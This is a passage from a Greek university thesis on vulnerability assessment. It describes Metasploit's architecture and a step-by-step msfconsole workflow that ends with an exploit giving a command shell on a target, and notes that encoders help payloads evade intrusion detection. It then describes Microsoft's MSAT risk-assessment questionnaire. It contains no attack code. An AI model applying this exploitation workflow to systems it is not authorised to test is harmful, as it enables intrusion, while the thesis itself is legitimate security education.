συστήματα από το να αναγνωρίσουν τα αποτυπώματα αυτών των ύποπτων τεχνικών και

έτσι αυτά καταφέρουν να λειτουργούν ανενόχλητα.

• Τα Auxiliary Modules παρέχουν επιπλέον χρηστικότητα και ευελιξία σε θέματα

εξερεύνησης της υποδομής. Σκοπός τους είναι αυτοματοποίηση των ελέγχων τρωτότητας

και η δυνατότητα παραγωγής αναφορών.

• Το MSF έχει τη δυνατότητα να μεταβάλλεται και να εξελίσσεται σύμφωνα με τις

εκάστοτε ανάγκες. Αυτό επιτυγχάνεται μέσω των plugins. Για παράδειγμα ένα plugin

μπορεί να αναπτυχθεί έτσι ώστε να προσθέτει μια καινούργια εντολή στην διεπαφή

κονσόλας ελέγχου. Ακόμα μπορεί να δημιουργηθεί ένα plugin που θα προσδιορίζει τις

απομακρυσμένες μηχανές στο δίκτυο και θα κατονομάζει τις υπηρεσίες που θα τρέχουν

σε αυτές. Στη συνέχεια, σύμφωνα με τα προηγούμενα αποτελέσματα, θα δοκιμάζει ένα

προκαθορισμένο πλήθος exploit και διάφορους τύπους payloads που θα επιτρέψουν την

απόκτηση πρόσβασης στο απομακρυσμένο μηχάνημα. Παράλληλα με αυτά, θα

διατηρείται και μια βάση δεδομένων που θα αποθηκεύει όλες τις παραπάνω ενέργειες και

τα αποτελέσματα αυτών. Επίσης μπορεί να καθοριστεί η αλληλουχία των εργασιών

ελέγχου. Γενικά είναι κάτι που εξαρτάται απόλυτα από την δημιουργικότητα του

ερευνητή ασφάλειας.

• Στην τρέχουσα έκδοση 3.3.3 του MSF υπάρχει η δυνατότητα συνεργασίας με το Dradis

Framework για την αποθήκευση, το διαμοιρασμό και τον μεταγενέστερο έλεγχο των

ευρημάτων κατά την διάρκεια ενός ελέγχου τρωτότητας.

Page 141: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

141 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Το MSF είναι λογισμικό ανοιχτού κώδικα, με μια μεγάλη κοινότητα που το υποστηρίξει

και το εξελίσσει συνεχώς. Αυτό σημαίνει ότι οι δυνατότητές του συνεχώς διευρύνονται

και η χρηστικότητά του διαρκώς αυξάνεται.

4.6.3 Περιορισμοί και παρενέργειες

Το MSF εκτός των αξιόλογων δυνατοτήτων του, έχει και κάποιους περιορισμούς και

παρενέργειες, οι κυριότερες από τις οποίες είναι:

• Τα exploits που περιέχει συχνά δεν είναι ενημερωμένα με τις τελευταίες ευπάθειες

• Τα μηχανήματα στόχοι στα οποία διενεργούνται έλεγχοι με χρήση του Metasploit μπορεί

να το εκτεθούν σε κίνδυνο

• Η χρήση του μπο ρεί να ο δηγήσει σε παραβίαση της πολιτικής ασφάλειας ενός

οργανισμού

• Τα περισσότερα exploits αφορούν Windows λειτουργικά συστήματα

• Δεν παράγει αυτόματες αναφορές

4.6.4 Αρχιτεκτονική και τρόπος λειτουργίας

To MSF αποτελείται από πλήθος συστατικών τα οποία ενεργούν, ώστε καταρχήν να

αποκαλύψουν ένα σύστημα και μετά να αλληλεπιδράσουν με τον επιθυμητό κόμβο. Η

αρχιτεκτονική του MSF φαίνεται στη επόμενη Εικόνα.

Εικόνα 4.10: Η αρχιτεκτονική του Metasploit

Page 142: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

142 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Τα δομικά στοιχεία της αρχιτεκτονικής του MSF είναι τα ακόλουθα:

• Rex: Το Rex είναι ο θεμέλιος λίθος στη σύνθεση του MSF.Το Rex προκύπτει από το

Ruby Extension Library (βιβλιοθήκη της γλώσσας προγραμματισμού Ruby). H Rex

βιβλιοθήκη είναι μια συλλογή από όλες τις απαραίτητες κλάσεις και modules που

μπορούν να χρησιμοποιηθούν από προγραμματιστές, ώστε να αναπτύξουν εφαρμογές και

εργαλεία γύρω από το MSF διαμορφώνοντας, τελικά, το σύνολό του στις απαιτήσεις

τους.

• Framework Core: Ο πυρήνας της πλατφόρμας (Framework Core) αποτελείται από

πολλά υποσυστήματα, τα οποία χρησιμοποιούνται για τη διαχείριση των modules, την

διαχείριση των συνόδων και την διεκπεραίωση εκβάσεων και γεγονότων. Ο πυρήνας,

επίσης, παρέχει τους απαραίτητους συνδέσμους και διεπαφές αλληλεπίδρασης ανάμεσα

στα modules και στα plugins με όλη την υπόλοιπη MSF υποδομή. Ακολουθώντας την

αντικειμενοστραφή προσέγγιση όλης της αρχιτεκτονικής το ίδιο το MSF αποτελεί μία

κλάση από μόνο του, κάτι που συνεπάγεται ότι μπορεί να χρησιμοποιηθεί σαν

στιγμιότυπο και αυτό, όπως κάθε άλλο αντικείμενο. Ο πυρήνας της πλατφόρμας

αποτελείται από τρία στοιχεία. Αυτά είναι:

o Datastore: Αποτελεί τη βασική συνιστώσα του Framework. Οι διεπαφές το

χρησιμοποιούν για τη ρύθμιση των παραμέτρων, τα payloads το χρησιμοποιούν για το

patch των opcodes, τα exploits το χρησιμοποιούν για να καθορίσουν τις παραμέτρους

και επίσης χρησιμοποιείται εσωτερικά για το πέρασμα των επιλογών μεταξύ των

modules. Υπάρχουν δύο τύποι datastores. Πρώτον, υπάρχει μια καθολική datastore η

οποία μπορεί να προσεγγιστεί με την setg και unsetg εντολές από msfconsole.

Δεύτερον, κάθε στιγμιότυπο module έχει το δικό του datastore, στο οποίο μπορούν να

αποθηκεύονται αυθαίρετες επιλογές ή παράμετροι. Αυτός ο διαχωρισμός του

συστήματος datastore επιτρέπει την εξοικονόμηση χρόνου κατά την διάρκεια των

ελέγχων διείσδυσης. Κοινές ρυθμίσεις μεταξύ των exploits μπορούν να ορίζονται στο

καθολικό datastore μια φορά και να χρησιμοποιούνται αυτόματα σε κάθε exploit που

φορτώνεται στη συνέχεια. Επίσης μπορεί να χρησιμοποιηθεί για τη ρύθμιση διαφόρων

παραμέτρων του Framework όπως ρυθμίσεις της διεπαφής χρήστη, συγκεκριμένες

ρυθμίσεις timeouts του socket API του δικτύου κλπ.

o Event Notification: Δίνει στον προγραμματιστή την δυνατότητα ειδοποίησης και

αντίδρασης σε συγκεκριμένα γεγονότα που προκύπτουν και τα οποία πρέπει να

γνωστοποιούνται στον χρήστη, όπως η επιτυχημένη έκβαση ενός exploit ή η

ανακάλυψη ενός νέου διαθέσιμου κόμβου.

o Framework Managers: Αποτελείται από υποσυστήματα υπεύθυνα για τη διαχείριση

Page 143: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

143 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

των modules, των plugins, των οντοτήτων αναγνώρισης του στόχου, των συνόδων και

μεμονωμένων σύντομων στιγμιότυπων των προγραμμάτων (jobs).

• Framework Base Interfaces: Αυτό το δομικό συστατικό βρίσκεται στον πυρήνα της

πλατφόρμας και παρέχει τις διεπαφές για τη διευκόλυνση της αλληλεπίδρασης με τον

πυρήνα.

• Interfaces: Οι διεπαφές χρησιμοποιούνται για τις αλληλεπιδράσεις με το χρήστη, όπως

π.χ επιλογή modules. Η πλατφόρμα μπορεί να τρέξει είτε:

o από την αλληλεπιδραστική κονσόλα γραμμής εντολών msfcli

o από την εναλλακτική κονσόλα γραμμής εντολών msfconsole

o από το γραφικό περιβάλλον msfgui

o είτε με χρήση του φυλλομετρητή μέσω του msfweb.

• Modules: Τα modules μέσα στην πλατφόρμα συνίστανται στα:

o Exploits. Είναι γραμμένα σε Ruby και είναι αυτά που ενεργοποιούν τις υπερχειλίσεις

και εκμεταλλεύονται τις ευπάθειες στον διακομιστή του στόχου, ενώ εγχύνουν σε

αυτόν τα επιλεγμένα payloads τα οποία θα εκτελέσουν κώδικα ή θα

πραγματοποιήσουν χρήσιμες ενέργειες.

o Payloads. Εάν στεφθούν με επιτυχία τα exploits υπάρχουν πολλές επιλογές για τις

ενέργειες που θα πραγματοποιηθούν στον στόχο. Τα payloads είναι τα κομμάτια

κώδικα τα οποία εφορμούν στο εσωτερικό του στόχου και αποτελούν αναπόσπαστο

μέρος της όλης επιχείρησης απόκτησης πρόσβασης στο απομακρυσμένο σύστημα.

Ένα payload είναι συνήθως μια αλληλουχία από assembly εντολές, που για να

συντεθούν με επιτυχία ο προγραμματιστής πρέπει να έχει καλή γνώση τόσο της

assembly, όσο και των εσωτερικών διεργασιών του στοχευόμενου λειτουργικού

συστήματος.

o NOP Generators. Είναι βοηθητικό module το οποίο χρησιμοποιείται για την

δημιουργία μη λειτουργικών εντολών, κυρίως για χρονοπρογραμματιστικούς

σκοπούς.

o Encoders. (Κωδικοποιητές) Χρησιμοποιούνται για την κωδικοποίηση των payload

πακέτων ώστε να μην είναι εύκολα ανιχνεύσιμα από τα συστήματα εντοπισμού

εισβολών.

o Auxiliary Modules. Μια σημαντική προσθήκη μετά την έκδοση MSF 3.0 είναι τα

auxiliary modules τα οποία παρέχουν επιπλέον βοήθεια και λειτουργικότητα στον

ερευνητή σε θέματα εξερεύνησης του στόχου.

• Plugins: Συγκριτικά με τα modules, τα plugins έχουν σχεδιαστεί έτσι ώστε να αλλάζουν

το MSF αυτό καθ’ αυτό. Η εισαγωγή νέων plugins είναι που εξυψώνει την ωφελιμότητα

του framework ως εργαλείο ανάπτυξης ασφάλειας.

Page 144: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

144 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Ο χρήστης μπορεί να επιλέξει μια από τις τέσσερις διαθέσιμες διεπαφές αλληλεπίδρασης με

το εργαλείο που αναφέρθηκαν παραπάνω. Προτεινόμενη είναι η msfconsole γιατί έχει τα

εξής πλεονεκτήματα:

• Είναι ο μόνος τρόπος για να έχει ο χρήστης πρόσβαση στις περισσότερες δυνατότητες

του Metasploit.

• Παρέχει μια console-based διεπαφή στο framework

• Περιέχει τις περισσότερες δυνατότητες και είναι η πιο σταθερή διεπαφή του MSF

• Είναι δυνατή η εκτέλεση εξωτερικών εντολών μέσω αυτής της κονσόλας

Εικόνα 4.11: Η κονσόλα του Metasploit

Τρόπος Λειτουργίας

1. Αφού ο χρήστης επιλέξει το επιθυμητό Module με την εντολή 'use', το επόμενο βήμα

είναι να καθορίσει ποιες επιλογές απαιτούνται.

2. Αυτό μπορεί να γίνει με την εντολή 'show options'.

3. Με τη χρήση της εντολής 'use' διαμορφώνονται οι κατάλληλες τιμές για όλες τις

επιθυμητές επιλογές.

4. Με την εντολή 'check' προσδιορίζεται εάν το σύστημα στόχος είναι ευπαθές στο τρέχον

exploit module.

5. Πολλά exploits απαιτούν τη μεταβλητή περιβάλλοντος TARGET. Η εντολή 'show targets'

θα απαριθμήσει όλους τους στόχους που παρέχονται από το exploit module. Πολλά

exploits έχουν προεπιλεγμένη την επιλογή brute force target το οποίο μπορεί να μην είναι

επιθυμητό σε όλες τις καταστάσεις.

Page 145: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

145 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6. Τα Payload modules ενθυλακώνουν τον κώδικα (shellcode) που εκτελείται ως το

αποτέλεσμα ενός επιτυχημένου exploit. Τα Payload modules συνήθως χτίζουν ένα κανάλι

επικοινωνίας μεταξύ του Metasploit και των κόμβων θυμάτων. Χρησιμοποιώντας την

εντολή 'show payloads' εμφανίζεται μια λίστα με όλα τα payloads που είναι συμβατά με

το με το τρέχον exploit.

7. Με την εντολή exploit πραγματοποιείται η επίθεση. Το Payload θα εκτελεστεί και θα

παρέχει στο χρήστη ένα διαδραστικό command shell για την επικοινωνία με το σύστημα

που έχει εκμεταλλευτεί.

Για περισσότερες πληροφορίες ο αναγνώστης παραπέμπεται στην βιβλιογραφία του

εργαλείου.

Page 146: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

146 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.7 MSAT

4.7.1 Ταυτότητα Το Microsoft Security Assessment Tool (MSAT) είναι ένα δωρεάν εργαλείο αξιολόγησης

επικινδυνότητας. Σκοπό έχει να βοηθήσει τους οργανισμούς και τις επιχειρήσεις να

αξιολογήσουν τις αδυναμίες τους στο τρέχον περιβάλλον ασφάλειας των τεχνολογιών

πληροφορικής, να ανακαλύψουν τα τρωτά σημεία τους, καθώς και η παροχή συγκεκριμένων

οδηγιών για τον περιορισμό των κινδύνων. Το MSAT βοηθά στον προσδιορισμό της

επικρατούσας κατάστασης ασφάλειας της επιχείρησης, ενώ η χρήση του σε τακτά χρονικά

διαστήματα συμβάλει στην παρακολούθηση της ικανότητας των μέτρων που λαμβάνονται

για την αντιμετώπιση των κινδύνων. Είναι διαθέσιμο μέσω της ιστοσελίδας

http://technet.microsoft.com/en-us/security/cc185712.aspx.

Το εργαλείο MSAT απευθύνεται σε μικρές και μεσαίου μεγέθους επιχειρήσεις οι οποίες

διαθέτουν 50 – 500 σταθμούς εργασίας ή/και 100 – 1000 εργαζόμενους. Υιοθετώντας μια

ολιστική προσέγγιση στη μέτρηση της ασφάλειας, αποτελείται από περισσότερες από 200

ερωτήσεις οι οποίες είναι ταξινομημένες στις επιμέρους ενότητες: Υποδομής

(Infrastructure), Εφαρμογών (Applications), Διαδικασιών (Operations) και Ανθρώπινου

Δυναμικού (People). Οι ερωτήσεις, οι απαντήσεις και τα προτεινόμενα μέτρα ασφάλειας

είναι σύμφωνα με τις κοινά αποδεκτές καλύτερες πρακτικές, τα πρότυπα ISO 17799 και

NIST 800.x, την τεχνογνωσία της Microsoft καθώς και άλλες πηγές ασφάλειας.

Μέσα από μια σειρά ερωτήσεων σχετικά με το επιχειρηματικό μοντέλο της εταιρείας το

εργαλείο χτίζει το Επιχειρησιακό Προφίλ Επικινδυνότητας (Business Risk Profile –

BRP), το οποίο μετρά τους κινδύνους που προκύπτουν για την εταιρεία τόσο από το χώρο

στον οποίο δραστηριοποιείται, όσο και από το επιχειρησιακό μοντέλο που προσδιορίζεται

από το BRP. Μια δεύτερη σειρά ερωτήσεων οι οποίες τίθενται από το εργαλείο, έχουν

σκοπό την σύνταξη μιας λίστας των μέτρων ασφάλειας που έχει εφαρμόσει η εταιρεία στην

πορεία του χρόνου. Ο συνδυασμός των μέτρων προστασίας διαμορφώνει τα επίπεδα άμυνας

παρέχοντας μεγαλύτερη προστασίας ενάντια σε πιθανές απειλές και συγκεκριμένες

ευπάθειες. Κάθε επίπεδο συνεισφέρει στη δημιουργία μιας συνδυασμένης στρατηγικής

άμυνας σε βάθος (defense-in-depth). Αυτό αναφέρεται ως Defense-in-Depth Index (DiDI).

Το BRP και το DiDI στη συνέχεια συγκρίνονται με σκοπό να μετρήσουν την κατανομή του

κινδύνου σε όλα τα πεδία της ανάλυσης (Areas of Analysis - AoAs) – υποδομές, εφαρμογές,

διαδικασίες και ανθρώπινο δυναμικό.

Page 147: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

147 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Το MSAT, επιπλέον, μετρά και την ωριμότητα ασφάλειας της επιχείρησης. Η ωριμότητα

ασφάλειας αναφέρεται στα ληφθέντα μέτρα ασφάλειας και στις πρακτικές συντήρησής τους.

Στο χαμηλότερο επίπεδο ωριμότητας κατατάσσονται τα λίγα αμυντικά μέτρα ασφάλειας τα

οποία συνήθως εφαρμόζονται μετά από την εκδήλωση ενός κινδύνου. Στο υψηλότερο

επίπεδο ωριμότητας κατατάσσονται καθιερωμένες και επαληθευμένες διαδικασίες, οι οποίες

επιτρέπουν σε μια εταιρεία να είναι περισσότερο δυναμική και να ανταποκρίνεται

αποτελεσματικότερα και με συνέπεια όταν απαιτείται.

Οι προτάσεις διαχείρισης των κινδύνων που παράγει το εργαλείο για το περιβάλλον της

επιχείρησης λαμβάνουν υπόψη την υπάρχουσα τεχνολογική κλιμάκωση, την τρέχουσα

κατάσταση ασφάλειας και τις στρατηγικές άμυνας σε βάθος. Οι συστάσεις αποσκοπούν να

προσανατολίσουν την επιχείρηση στην υιοθέτηση ενεργειών που περιγράφονται από τις

αναγνωρισμένες καλύτερες πρακτικές.

Το MSAT μέσω των ερωτήσεων που χρησιμοποιεί, προσπαθεί να καλύψει μια ευρεία

περιοχή πιθανών κινδύνων του περιβάλλοντος της επιχείρησης και όχι να παρέχει μια σε

βάθος ανάλυση των ιδιαίτερων τεχνολογιών και διαδικασιών που εφαρμόζονται στην

επιχείρηση. Αυτό σημαίνει ότι δεν μπορεί να μετρήσει την αποτελεσματικότητα των μέτρων

ασφάλειας που εφαρμόζονται. Αποτελεί όμως έναν οδηγό για τη λήψη των βασικών μέτρων

ασφάλειας στο περιβάλλον της επιχείρησης, τονίζοντας τα σημεία στα οποία απαιτείται

ιδιαίτερη προσοχή. Η εκτέλεση του εργαλείου μετά από την εφαρμογή μέτρων προστασίας

μπορεί να βοηθήσει την επιχείρηση να προσδιορίσει την πρόοδο που έχει κάνει σε σχέση με

την αρχική αναφορά.

4.7.2 Δυνατότητες Οι ερωτήσεις αξιολόγησης επικινδυνότητας του MSAT είναι ταξινομημένες σε τέσσερις

ενότητες, καθεμία από τις οποίες αποτελείται από περισσότερες υποενότητες.

Αναλυτικότερα η αξιολόγηση αφορά στα εξής:

Υποδομή (Infrastructure)

Αυτή η ενότητα εστιάζει στο πως λειτουργεί το δίκτυο, ποιες επιχειρηματικές διαδικασίες

(εσωτερικές ή εξωτερικές) υποστηρίζονται, πως είναι δομημένοι οι υπολογιστές κόμβοι και

πόσο αποδοτικά διαχειρίζεται και συντηρείται το δίκτυο. Οι ερωτήσεις είναι χωρισμένες στις

εξής υποενότητες:

Page 148: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

148 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Άμυνα περιμέτρου (Perimeter Defense): Οι ερωτήσεις αυτής της υποενότητας

σχετίζονται με την ύπαρξη Αναχωμάτων Ασφάλειας, την ύπαρξη συστήματος ανίχνευσης

εισβολών (Intruder Detection System –IDS), τη χρήση λογισμικού Antivirus, τη

δυνατότητα απομακρυσμένης πρόσβασης (Remote Access), την τμηματοποίηση του

δικτύου (Segmentation), την χρήση ασύρματης δικτύωσης (Wireless Connectivity),

καθώς και τη φιλοξενία υπηρεσιών Internet στο δίκτυο της επιχείρησης.

• Αυθεντικοποίηση (Authentication): Οι ερωτήσεις σχετίζονται με την πολιτική

συνθηματικών που ακολουθείται για την αυθεντικοποίηση των χρηστών καθώς και για

τις διαδικασίες επισκόπησης των λογαριασμών χρηστών.

• Διαχείριση και Επίβλεψη (Management and Monitoring): Οι ερωτήσεις σε αυτή την

υποενότητα σχετίζονται με τις ρυθμίσεις που πραγματοποιούνται στα συστήματα της

επιχείρησης, τα μέτρα ασφάλειας που λαμβάνονται για τους σταθμούς εργασίας, την

πολιτική που ακολουθείται στην περίπτωση εκδήλωσης ενός περιστατικού ασφάλειας,

καθώς και στους ελέγχους φυσικής ασφάλειας.

Εφαρμογές (Applications)

Αυτή η ενότητα εξετάζει τις εφαρμογές που χρησιμοποιούνται στο περιβάλλον του

πληροφοριακού συστήματος και είναι κρίσιμες για την επιχείρηση. Η αξιολόγηση γίνεται

από την οπτικής της ασφάλειας και τις διαθεσιμότητας τους. Εξετάζονται οι τεχνολογίες οι

οποίες σε συνδυασμό με το περιβάλλον του συστήματος ενισχύουν την άμυνα σε βάθος. Οι

ερωτήσεις είναι χωρισμένες στις εξής υποενότητες:

• Εγκατάσταση και χρήση (Deployment and Use): Οι ερωτήσεις σε αυτή την

υποενότητα αφορούν στην ανάπτυξη εφαρμογών που σχετίζονται με τη λειτουργία της

επιχείρησης, τους μηχανισμούς διαθεσιμότητας αυτών των εφαρμογών, τις διαδικασίες

ενημέρωσής τους, την εκπαίδευση του προσωπικού ανάπτυξης λογισμικού για θέματα

ασφάλειας καθώς και τις μεθοδολογίες ανάπτυξης ασφαλούς λογισμικού.

• Σχεδίαση εφαρμογής (Application Design): Οι ερωτήσεις εδώ σχετίζο νται με τις

πολιτικές συνθηματικών που ακολουθούνται για την αυθεντικοποίηση των χρηστών στις

κρίσιμες εφαρμογές της επιχείρησης, τους μηχανισμούς περιορισμού πρόσβασης σε

δεδομένα και λειτουργίες, την καταγραφή συμβάντων και την επικύρωση των δεδομένων

που εισάγονται σε μια εφαρμογή.

• Αποθήκευση δεδομένων και επικοινωνίες (Data Storage and Communications): Οι

ερωτήσεις σε αυτή την υποενότητα σχετίζονται με την κρυπτογράφηση των δεδομένων.

Page 149: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

149 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Διαδικασίες (Operations)

Σε αυτή την ενότητα αξιολογούνται οι πρακτικές λειτουργίας, οι διαδικασίες και οι

κατευθυντήριες γραμμές που ακολουθούνται από την επιχείρηση για την ενίσχυση της

στρατηγικής άμυνας σε βάθος. Εξετάζονται οι περιοχές που σχετίζονται με την δομή του

συστήματος, την τεκμηρίωση του δικτύου, την αποθήκευση και ανάκτηση δεδομένων σε

σχέση με το περιβάλλον. Οι ερωτήσεις χωρίζονται στις εξής υποενότητες:

• Περιβάλλον (Environment): Οι ερωτήσεις σχετίζονται με το ποιος διαχειρίζεται το

περιβάλλον, αν υπάρχουν αυτόνομα συστήματα διαχείρισης, αν χρησιμοποιούνται

διαφορετικοί τύποι λογαριασμών εισόδου, αν ελέγχεται τακτικά η λειτουργία των

αναχωμάτων ασφάλειας και αν υπάρχει σχέδιο ανάκαμψης από καταστροφή.

• Πολιτική Ασφάλειας (Security Policy): Αυτή η υποενότητα καλύπτει πολιτικές που

αφορούν όλους τους τύπους της ασφάλειας όπως χρήστες, συστήματα και δεδομένα. Οι

ερωτήσεις σχετίζονται με την ύπαρξη μοντέλου προτεραιοτήτων στο πληροφοριακό

περιβάλλον, την ύπαρξη πολιτικών διαχείρισης του πληροφοριακού περιβάλλοντος και

την ύπαρξη τεκμηριωμένων διαδικασιών.

• Διαχείριση Ενημερώσεων (Patch & Update Management): Οι ερωτήσεις σε ατή την

υποενότητα αφορούν στην ύπαρξη διαδικασιών διαχείρισης των αλλαγών των ρυθμίσεων

του συστήματος, στην ύπαρξη πολιτικής ενημερώσεων των συστημάτων καθώς και για

την ύπαρξη διαγραμμάτων για το δίκτυο και τις εφαρμογές.

• Αντίγραφα Ασφάλειας και Ανάνηψης (Backup and Recovery): Οι ερωτήσεις εδώ

σχετίζονται με την καταγραφή συμβάντων και την ύπαρξη μηχανισμού δημιουργίας

αντιγράφων ασφάλειας.

Ανθρώπινο Δυναμικό (People)

Η τελευταία ενότητα ερωτήσεων του MSAT αφορά το ανθρώπινο δυναμικό. Γίνεται μια

ανασκόπηση των διαδικασιών, των πολιτικών ασφάλειας και της γνώσης τους από το

προ σωπικό καθώς και της εκπαίδευσής το υς σε θέματα ασφάλειας. Χωρίζεται στις εξής

υποενότητες:

• Απαιτήσεις και Αξιολογήσεις (Requirement & Assessments): Οι ερωτήσεις αφορούν

την ύπαρξη υπεύθυνου/ων ασφάλειας στην επιχείρηση και στον καθορισμό των

αρμοδιοτήτων του, καθώς και στην διενέργεια ελέγχων ασφάλειας τόσο από τρίτα μέρη,

όσο και από τους υπεύθυνους ασφάλειας της επιχείρησης.

• Πολιτικές και Διαδικασίες (Policies & Procedures): Τα ερωτήματα αφορούν τη

διερεύνηση του παρελθόντος των υπό πρόσληψη υπαλλήλων, την διαδικασία απόλυση

υπαλλήλων καθώς και την ύπαρξη πολιτικής προσδιορισμού των σχέσεων με τρίτα μέρη.

Page 150: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

150 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Εκπαίδευση και Ενημέρωση (Training & Awareness): Οι ερωτήσεις σχετίζονται με

τις υπάρχουσες διαδικασίες εκπαίδευσης και ενημέρωσης των υπαλλήλων σε θέματα

ασφάλειας.

Με την ολοκλήρωση της εκτέλεσης του εργαλείου παράγεται η αναφορά με τα

αποτελέσματα της αξιολόγησης. Η αναφορά είναι πολύ αναλυτική και φιλική προς το

χρήστη. Παρέχει πληροφορίες τόσο για τη διαδικασία παραγωγής της, όσο και για την

ερμηνεία των αποτελεσμάτων της. Περιλαμβάνει την αξιολόγηση του εργαλείου για το

επίπεδο ασφάλειας, υποδείξεις για σημεία στα οποία υστερεί η ασφάλειας της επιχείρησης

και προτροπές για την συνέχιση ήδη υπαρκτών αποτελεσματικών πρακτικών. Οι υποδείξεις

και προτροπές που παρέχονται βασίζονται σε αναγνωρισμένες καλύτερες πρακτικές (best

practices) και προσπαθούν να καθοδηγήσουν την επιχείρηση στην υιοθέτηση τους. Υπάρχει

η δυνατότητα ανώνυμης αποστολής της αναφοράς στην Microsoft και η σύγκριση των

αποτελεσμάτων με τα αποτελέσματα άλλων εταιρειών που δραστηριοποιούνται στον ίδιο

επιχειρηματικό τομέα. Επιπλέον η αναφορά μπορεί να εκτυπωθεί ή να αποθηκευτεί για

μελλοντική σύγκρισή της με τα αποτελέσματα μιας νέας αξιολόγησης.

